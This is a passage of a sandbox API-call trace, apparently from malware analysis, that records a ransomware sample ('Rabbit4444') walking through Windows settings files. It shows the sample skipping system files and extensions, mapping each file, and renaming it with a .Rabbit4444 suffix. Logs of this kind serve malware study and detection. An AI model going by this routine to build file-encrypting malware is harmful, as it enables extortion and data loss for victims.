[0056.327] CloseHandle (hObject=0x298) returned 1 [0056.327] CloseHandle (hObject=0x278) returned 1 [0056.327] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms.Rabbit4444") returned 183 [0056.327] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupeaseofaccessnarrator.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupeaseofaccessnarrator.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.328] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf12613b7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf12613b7, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms", cAlternateFileName="AAEB38~1.SET")) returned 1 [0056.328] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.328] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.328] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.328] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms", lpString2=".") returned 1 [0056.328] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms", lpString2="..") returned 1 [0056.328] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms", lpString2="windows") returned -1 [0056.328] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.328] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.328] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms", lpString2="boot") returned -1 [0056.328] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.328] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.328] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms" | out: lpString1="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms") returned="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms" [0056.328] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.329] lstrlenW (lpString="AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms") returned 50 [0056.329] lstrlenW (lpString="Rabbit4444") returned 10 [0056.329] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.329] lstrlenW (lpString=".dll") returned 4 [0056.329] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.329] lstrlenW (lpString=".lnk") returned 4 [0056.329] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.329] lstrlenW (lpString=".ini") returned 4 [0056.329] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.329] lstrlenW (lpString=".sys") returned 4 [0056.329] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.329] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupeaseofaccessosk.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.329] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.329] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14763999049) returned 1 [0056.329] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1146) returned 1 [0056.329] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0056.329] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0056.329] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x780, lpName=0x0) returned 0x298 [0056.330] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x780) returned 0x70000 [0056.331] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.331] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0056.331] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.331] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.331] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.333] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.333] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.333] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0056.333] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14764402144) returned 1 [0056.333] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0056.333] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0056.333] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.333] CloseHandle (hObject=0x298) returned 1 [0056.334] CloseHandle (hObject=0x278) returned 1 [0056.334] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms.Rabbit4444") returned 178 [0056.334] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupeaseofaccessosk.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupeaseofaccessosk.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.334] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1582539, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf1582539, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x2391d733, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x484, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms", cAlternateFileName="AAD0AF~1.SET")) returned 1 [0056.334] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.334] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.334] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.334] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms", lpString2=".") returned 1 [0056.334] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms", lpString2="..") returned 1 [0056.334] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms", lpString2="windows") returned -1 [0056.334] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.334] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.335] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms", lpString2="boot") returned -1 [0056.335] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.335] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.335] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms" | out: lpString1="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms") returned="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms" [0056.335] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.336] lstrlenW (lpString="AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms") returned 52 [0056.336] lstrlenW (lpString="Rabbit4444") returned 10 [0056.336] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.336] lstrlenW (lpString=".dll") returned 4 [0056.336] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.336] lstrlenW (lpString=".lnk") returned 4 [0056.336] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.336] lstrlenW (lpString=".ini") returned 4 [0056.336] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.336] lstrlenW (lpString=".sys") returned 4 [0056.336] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.336] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupeaseofaccessother.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.336] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.336] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14764704561) returned 1 [0056.336] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1156) returned 1 [0056.336] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0056.336] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0056.336] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790, lpName=0x0) returned 0x298 [0056.338] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x70000 [0056.338] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.338] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.338] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.338] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0056.338] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.339] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0056.339] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.339] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.339] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14764950838) returned 1 [0056.339] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0056.339] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0056.339] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.339] CloseHandle (hObject=0x298) returned 1 [0056.339] CloseHandle (hObject=0x278) returned 1 [0056.339] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms.Rabbit4444") returned 180 [0056.339] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupeaseofaccessother.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupeaseofaccessother.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.340] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf17be8df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf17be8df, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms", cAlternateFileName="AAC64E~1.SET")) returned 1 [0056.340] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.340] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.340] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.340] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms", lpString2=".") returned 1 [0056.340] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms", lpString2="..") returned 1 [0056.340] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms", lpString2="windows") returned -1 [0056.340] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.340] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.340] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms", lpString2="boot") returned -1 [0056.340] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.340] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.340] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms" | out: lpString1="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms") returned="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms" [0056.340] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.340] lstrlenW (lpString="AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms") returned 57 [0056.340] lstrlenW (lpString="Rabbit4444") returned 10 [0056.341] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.341] lstrlenW (lpString=".dll") returned 4 [0056.341] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.341] lstrlenW (lpString=".lnk") returned 4 [0056.341] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.341] lstrlenW (lpString=".ini") returned 4 [0056.341] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.341] lstrlenW (lpString=".sys") returned 4 [0056.341] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.341] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupeaseofaccessstickykeys.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.341] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.341] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14765173961) returned 1 [0056.341] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1181) returned 1 [0056.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0056.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0056.341] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x298 [0056.342] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x70000 [0056.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.343] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0056.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.343] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.343] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.344] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.344] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14765431158) returned 1 [0056.344] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0056.344] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0056.344] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.344] CloseHandle (hObject=0x298) returned 1 [0056.344] CloseHandle (hObject=0x278) returned 1 [0056.344] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms.Rabbit4444") returned 185 [0056.344] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupeaseofaccessstickykeys.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupeaseofaccessstickykeys.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.345] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf18efc2f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf18efc2f, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms", cAlternateFileName="AAD87B~1.SET")) returned 1 [0056.345] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.345] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.345] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.345] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms", lpString2=".") returned 1 [0056.345] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms", lpString2="..") returned 1 [0056.345] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms", lpString2="windows") returned -1 [0056.345] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.345] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.345] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms", lpString2="boot") returned -1 [0056.345] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.345] lstrcmpiW (lpString1="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.345] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms" | out: lpString1="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms") returned="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms" [0056.345] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.346] lstrlenW (lpString="AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms") returned 57 [0056.346] lstrlenW (lpString="Rabbit4444") returned 10 [0056.346] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.346] lstrlenW (lpString=".dll") returned 4 [0056.346] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.346] lstrlenW (lpString=".lnk") returned 4 [0056.346] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.346] lstrlenW (lpString=".ini") returned 4 [0056.346] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.346] lstrlenW (lpString=".sys") returned 4 [0056.346] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.346] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms" (normalized: 